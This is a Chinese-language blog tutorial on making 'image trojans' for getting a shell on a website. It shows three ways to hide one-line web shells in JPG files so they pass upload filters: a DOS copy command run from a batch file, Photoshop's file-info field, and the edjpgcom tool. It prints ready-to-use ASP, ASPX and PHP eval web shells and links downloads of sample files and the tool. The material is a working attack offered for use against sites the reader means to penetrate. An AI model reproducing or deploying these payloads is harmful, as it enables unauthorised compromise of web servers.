一句话图片木马的诞生


00X00 序言

当你准备渗透目标时,好不容易找到一个上传点,但当你上传一句话木马时,提示你报错,无法上传或者不支持上传类型!这时我们一句话图片木马就可以上传,因为一般来讲上传点是不会过滤掉jpg或者png格式的图片的,所以我们可以来上传JPG包含一句话的图片马,再利用备份数据库来将木马备份成*.xxx文件。不如南方站点和phpcms就可以这样利用,这已经是很经典甚至有点旧的getshell方法了 。目前一般这种漏洞很少存在了。

00X01 制作方法

#Method 1:利用dos的copy命令

  1. 找一张图片 名字改成xxx.jpg(文件名随意 后缀只要是图片的格式就可以了)
  2. 新建文件夹,将我们选择的图片和准备好的一句话马子(格式如:1.php)放进去

1.png

新建文本,在里面写入:
copy xxx.jpg/b + xxx.php/a xxx.jpg

2.png

  1. 把txt后缀改成bat,点击运行。

3.png
OK,现在马子已经写进了图片,可以图片用记事本打开,拉到最后就能看到了!
4.png

示例下载

smlwl.rar

解压密码:smlwl.xyz


#Method 2:PS制作

  1. 用Adobe Photoshop CS打开图片
  2. 选择文件——>文件简介,然后插入你需要的木马代码

    asp一句话:<%eval request("pass")%>
    aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],"unsafe");%>
    php一句话:<?php @eval($_POST["pass"]);?>

  3. 文件——>保存(可以覆盖源文件、也可另存为其它格式)

ps:我电脑ps出了点状况,所以这里没办法给大家演示方法二,但应该描述的够详细了。


#Method 3:edjpgcom工具
edjpgcom是一个很精巧强悍的小工具!主要是用于在图片里插入一句话马或者小马
打开edjpgcom所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入马子然后点OK就行!
6.png
注意:如果你直接双击edjpgcom试图打开,是报错的,提示你can't open file,要把图片拖到软件上,才会打开!必须要jpg格式!
5.png

工具下载:

edjpgcom.rar

解压密码:smlwl.xyz

声明:苏茗鹿的空间|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接


Carpe Diem and Do what I like